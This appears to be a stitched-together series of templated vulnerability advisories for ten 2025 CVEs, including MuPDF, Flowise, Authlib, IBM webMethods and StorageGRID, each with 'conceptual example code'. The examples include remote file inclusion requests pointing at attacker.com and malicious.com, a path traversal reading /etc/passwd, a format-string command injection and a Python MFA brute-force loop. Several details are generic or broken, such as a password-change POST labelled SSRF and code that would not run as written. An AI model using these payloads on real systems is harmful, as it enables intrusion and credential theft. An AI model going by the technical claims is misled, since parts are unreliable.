Author: Ameeba

Overview

CVE-2025-55780 is a significant vulnerability found in MuPDF 1.26.4, a popular software tool for rendering EPUB documents. This vulnerability can lead to a system crash, potentially compromising the system or leading to data leakage. Due to the widespread use of this software, this vulnerability presents a severe threat to numerous organizations and individuals worldwide.

Vulnerability Summary

CVE ID: CVE-2025-55780
Severity: High (7.5/10)
Attack Vector: Remote
Privileges Required: None
User Interaction: Required
Impact: System crash, potential system compromise, and data leakage

Affected Products

Product | Affected Versions

MuPDF | 1.26.4

How the Exploit Works

The exploit occurs when MuPDF attempts to render a malformed EPUB document. During this process, a null pointer dereference occurs in the function break_word_for_overflow_wrap(). The function calls fz_html_split_flow() to split a FLOW_WORD node, but does not check if node->next is valid before accessing node->next->overflow_wrap. If the split fails or returns a partial node chain, it results in a system crash.

Conceptual Example Code

Here is a conceptual example of how the vulnerability can be exploited using a malformed EPUB file:

<!DOCTYPE html>
<html>
<head>
<title>Malformed EPUB</title>
</head>
<body>
<p>
<!-- Insert malformed FLOW_WORD node here -->
<span style="overflow-wrap: break-word;">...</span>
</p>
</body>
</html>

In the above example, the ‘…’ can be replaced with a specifically crafted string that triggers the null pointer dereference vulnerability when MuPDF attempts to split the FLOW_WORD node.

Mitigation Guidance

Users of MuPDF 1.26.4 are advised to apply the vendor’s patch to fix this vulnerability. Alternatively, a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can be used as temporary mitigation.

Overview

CVE-2025-59527 is a critical vulnerability discovered in the Flowise application, specifically in the /api/v1/fetch-links endpoint. This Server-Side Request Forgery (SSRF) vulnerability exposes internal network web services to potential exploitation by attackers. The vulnerability is crucial as it allows potential system compromise or data leakage, impacting organizations using the affected version of the Flowise application.

Vulnerability Summary

CVE ID: CVE-2025-59527
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

Flowise Application | 3.0.5

How the Exploit Works

The exploit works by an attacker sending a malicious request to the /api/v1/fetch-links endpoint of the Flowise application. This request tricks the server into acting as a proxy for the attacker, allowing them to access and explore the link structures of internal network web services.

Conceptual Example Code

Here is a conceptual example of how the vulnerability might be exploited. This is a sample HTTP request:

GET /api/v1/fetch-links?target=http://internal.network.service HTTP/1.1
Host: vulnerable.flowise.server

In this example, the “http://internal.network.service” would be replaced with the internal network service the attacker wishes to access. The Flowise server, believing the request to be legitimate, acts as a proxy and provides the attacker with the information they need.

Mitigation

It is recommended to apply the vendor patch immediately. Flowise has patched this vulnerability in version 3.0.6. If immediate patching is not possible, organizations should use a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) to detect and mitigate potential exploits of this vulnerability until the patch can be applied.

Overview

This report addresses the CVE-2025-57925 vulnerability, an issue arising from the improper control of filename for Include/Require Statement in PHP programs. This vulnerability affects immonex Kickstart Team versions up to 1.6.9 and can result in a significant security breach, potentially leading to system compromise or data leakage.

Vulnerability Summary

CVE ID: CVE-2025-57925
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Possible system compromise or data leakage.

Affected Products

Product | Affected Versions

immonex Kickstart Team | Up to 1.6.9

How the Exploit Works

The exploit works by taking advantage of the PHP Remote File Inclusion vulnerability in the immonex Kickstart Team. This vulnerability arises from the improper control of filename for Include/Require Statement in PHP programs. A malicious actor may leverage this vulnerability to include a file from a remote server that contains malicious PHP code, leading to the execution of arbitrary PHP code on the affected system.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited:

GET /vulnerable_file.php?file=http://malicious.com/malicious.php HTTP/1.1
Host: target.example.com

In this example, the attacker sends a GET request to a vulnerable PHP file on the target host, passing a URL of a remote malicious PHP file as a parameter. The server then includes this remote file, executing the malicious PHP code.

Mitigation Guidance

To mitigate the effects of this vulnerability, users are advised to apply the vendor patch as soon as it is available. In the meantime, the use of a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation measure against possible exploits.

Overview

The vulnerability, identified as CVE-2025-53450, is a critical flaw in the Pluginwale Easy Pricing Table WP, which could allow an attacker to include local files via PHP remote file inclusion. The issue arises from improper handling of the filename for include/require statement in the PHP program, making various versions of Easy Pricing Table WP susceptible. This vulnerability is of significant concern due to its potential for system compromise or data leakage.

Vulnerability Summary

CVE ID: CVE-2025-53450
Severity: Critical (CVSS: 7.5)
Attack Vector: Network
Privileges Required: Low
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

Pluginwale Easy Pricing Table WP | n/a – 1.1.3

How the Exploit Works

An attacker exploits this vulnerability by manipulating the filename in the include/require statement of the PHP program. This manipulation allows the attacker to remotely include a file, typically from a server they control, into the server-side script. The included file can contain malicious PHP code that can be executed on the server, leading to potential full system compromise or data leakage.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited:

GET /index.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: vulnerablewebsite.com

In this example, the attacker is making a GET request to the vulnerable website, manipulating the ‘file’ parameter to include a PHP file from a server they control. The server then processes this malicious PHP file, leading to undesired actions such as system compromise or data leakage.

Mitigation Guidance

Users are advised to apply the vendor-provided patch immediately to mitigate this vulnerability. If the patch cannot be applied immediately, it is recommended to use a Web Application Firewall (WAF) or Intrusion Detection System (IDS) as a temporary mitigation measure.

Overview

CVE-2025-59420 is a critical vulnerability identified in the Authlib Python library. This vulnerability, which affects versions of Authlib prior to 1.6.4, has potential system compromise or data leakage implications for any servers built using this library. The vulnerability’s importance is underscored by its high CVSS severity score of 7.5 and the risks it poses to OAuth and OpenID Connect servers.

Vulnerability Summary

CVE ID: CVE-2025-59420
Severity: High – CVSS Score 7.5
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

Authlib Python Library | Prior to version 1.6.4

How the Exploit Works

This exploitable vulnerability lies in Authlib’s JWS verification process. It accepts tokens that declare unknown critical header parameters (crit). This behavior violates RFC 7515’s “must-understand” semantics. Attackers can craft a signed token with a critical header that strict verifiers would reject but Authlib would accept. In mixed-language fleets, this can enable split-brain verification, leading to policy bypass, replay attacks, or privilege escalation.

Conceptual Example Code

The following pseudocode exemplifies the crafting of the malicious token:

import jwt
header = {
"alg": "HS256",
"typ": "JWT",
"crit": ["bork", "cnf"]
}
payload = {"admin": True}
malicious_token = jwt.encode(header, payload, "secret_key")

In this example, the `”crit”` field in the header contains unrecognized parameters (`”bork”` and `”cnf”`). This token will be rejected by strict verifiers but accepted by Authlib prior to version 1.6.4, potentially leading to policy bypass, replay attacks, or privilege escalation.

Overview

The CVE-2025-57430 vulnerability pertains to Creacast Creabox Manager 4.4.4, a popular content management system. The product exposes sensitive configuration data via a public endpoint, potentially leading to unauthorized system access and data leakage. This vulnerability is of significant concern due to the potential for system compromise and the potential to reveal plaintext admin credentials.

Vulnerability Summary

CVE ID: CVE-2025-57430
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Unauthorized system access and potential data leakage

Affected Products

Product | Affected Versions

Creacast Creabox Manager | 4.4.4

How the Exploit Works

The vulnerability arises from an exposed endpoint (/get) that, when accessed, returns sensitive internal configuration data. Among the information exposed is the creacodec.lua file, which contains plaintext admin credentials. An attacker can access this endpoint without any required user interaction or privileges, making it a significant security risk.

Conceptual Example Code

This conceptual example demonstrates how the vulnerability might be exploited:

GET /get HTTP/1.1
Host: target.example.com
Content-Type: application/json

Upon sending this request, the sensitive configuration data, including the plaintext admin credentials, would be returned by the server, and could then be used for unauthorized system access.

Mitigation

The recommended mitigation for this vulnerability is to apply the vendor-supplied patch. If the patch is not immediately available or feasible to apply, a temporary mitigation can be achieved using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to block or monitor access to the vulnerable endpoint.

Overview

The CVE-2025-36202 vulnerability is a significant flaw in IBM’s webMethods Integration versions 10.15 and 11.1. This vulnerability, if exploited, could allow authenticated users with specific service execution privileges to carry out commands on the system. This flaw arises from improper validation of format string strings passed from an external source. It presents a substantial threat to organizational cybersecurity, potentially leading to system compromise or data leakage.

Vulnerability Summary

CVE ID: CVE-2025-36202
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: System compromise or data leakage

Affected Products

Product | Affected Versions

IBM webMethods Integration | 10.15
IBM webMethods Integration | 11.1

How the Exploit Works

The vulnerability is rooted in the improper validation of format string strings. An attacker, authenticated and possessing the necessary service execution privileges, could exploit this flaw to pass malicious commands from an external source. The system, failing to validate these strings adequately, could execute these commands, potentially compromising the system or leading to data leakage.

Conceptual Example Code

Here is a conceptual example of how the vulnerability might be exploited. Note that the following is a simplified representation and does not represent actual exploit code.

POST /executeService HTTP/1.1
Host: vulnerable-ibm-webmethods.com
Content-Type: application/json
Authorization: Basic [Base64-encoded credentials]
{
"service": "affectedService",
"args": {
"formatString": "%s%s%s%s%s...%s%s%s%s%s; malicious_command;"
}
}

In this example, the attacker uses a format string attack. They pass a malicious command within a string of format specifiers. The system, failing to validate the string properly, executes the malicious command as part of processing the format string.

Overview

The vulnerability identified as CVE-2025-35041 pertains to Airship AI’s Acropolis product and its handling of Multi-factor Authentication (MFA). This cybersecurity flaw allows for unlimited MFA attempts for a quarter of an hour after a user with valid credentials has logged in. Undeniably, this issue poses a significant risk to businesses and individuals utilizing the affected versions of Acropolis, as it creates an opportunity for unauthorized access and potential data leakage.

Vulnerability Summary

CVE ID: CVE-2025-35041
Severity: High (7.5 CVSS Score)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: Potential system compromise and data leakage

Affected Products

Product | Affected Versions

Airship AI Acropolis | <10.2.35, 11.0.20, 11.1.8 How the Exploit Works

The vulnerability arises due to improper handling of MFA by Airship AI Acropolis. Once a user with valid credentials logs into the system, the MFA process allows unlimited attempts to enter the 6-digit MFA code for a 15-minute window. A remote attacker can exploit this by launching a brute-force attack to guess the MFA code during this time period, potentially gaining unauthorized access to the system.

Conceptual Example Code

Although specific exploitation methods may vary, a brute-force attack could conceptually involve a script to automatically generate and attempt all possible 6-digit combinations within the 15-minute window. A rudimentary Python script might resemble:

import requests
username = 'valid_username'
password = 'valid_password'
mfa_code_start = 000000
mfa_code_end = 999999
for code in range(mfa_code_start, mfa_code_end):
response = requests.post('https://target.example.com/login', data = {'username': username, 'password': password, 'mfa_code': str(code).zfill(6)})
if 'Login successful' in response.text:
print("Access granted with MFA code: " + str(code).zfill(6))
break

Please note this is only a conceptual example and does not represent a real exploit.

Overview

This report details a significant vulnerability, identified as CVE-2025-26515, that affects previous versions of StorageGRID prior to 11.8.0.15 and 11.9.0.8 without Single Sign-On enabled. This vulnerability poses a serious threat as it can potentially allow an unauthenticated attacker to alter the password of any non-federated Grid Manager or Tenant Manager user. The severity of this vulnerability is underscored by its potential to compromise systems and lead to data leakage.

Vulnerability Summary

CVE ID: CVE-2025-26515
Severity: High, CVSS score: 7.5
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

StorageGRID | versions prior to 11.8.0.15
StorageGRID Webscale | versions prior to 11.9.0.8

How the Exploit Works

This exploit takes advantage of a Server-Side Request Forgery (SSRF) vulnerability in StorageGRID. By sending a maliciously crafted request, an unauthenticated attacker can trick the server into changing the password of any non-federated Grid Manager or Tenant Manager user. This could potentially allow the attacker to gain unauthorized access to the system and possibly leak sensitive data.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited. The attacker sends a malicious HTTP POST request, targeting the password change function of the server.

POST /api/change_password HTTP/1.1
Host: target.example.com
Content-Type: application/json
{
"username": "victim_user",
"new_password": "attacker_password"
}

In this example, `victim_user` would be the username of the targeted Grid Manager or Tenant Manager user and `attacker_password` would be the new password set by the attacker.

Overview

This report details the cybersecurity vulnerability known as CVE-2025-10468, which is an improper limitation of a pathname to a restricted directory, or ‘Path Traversal’, vulnerability that affects the software product CityPlus by Beyaz Computer. This vulnerability is of significant concern as it could lead to potential system compromise or data leakage, thereby posing a risk to the confidentiality, integrity, and availability of the affected systems.

Vulnerability Summary

CVE ID: CVE-2025-10468
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

CityPlus | Before 24.29375

How the Exploit Works

The CVE-2025-10468 vulnerability allows a malicious actor to traverse the file directory stored within CityPlus software due to insufficient security restrictions. This vulnerability can be exploited when the software fails to sufficiently sanitize user-supplied input before using it in file system operations. An attacker could manipulate file and directory paths to navigate out of the intended directory structure to access files or directories that are outside of the restricted directory.

Conceptual Example Code

Here is a conceptual example demonstrating how an HTTP request might be crafted to exploit this vulnerability:

GET /file?filename=../../../etc/passwd HTTP/1.1
Host: vulnerable.cityplus.com
Content-Type: application/json

In this example, the attacker is attempting to traverse the directory to access a sensitive file (`/etc/passwd`) that resides outside of the intended directory structure.

Mitigation

To mitigate this vulnerability, it is advised to apply the vendor’s patch for CityPlus versions before 24.29375. In situations where applying the patch is not immediately possible, a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation measure, providing some level of protection by detecting and blocking path traversal attempts.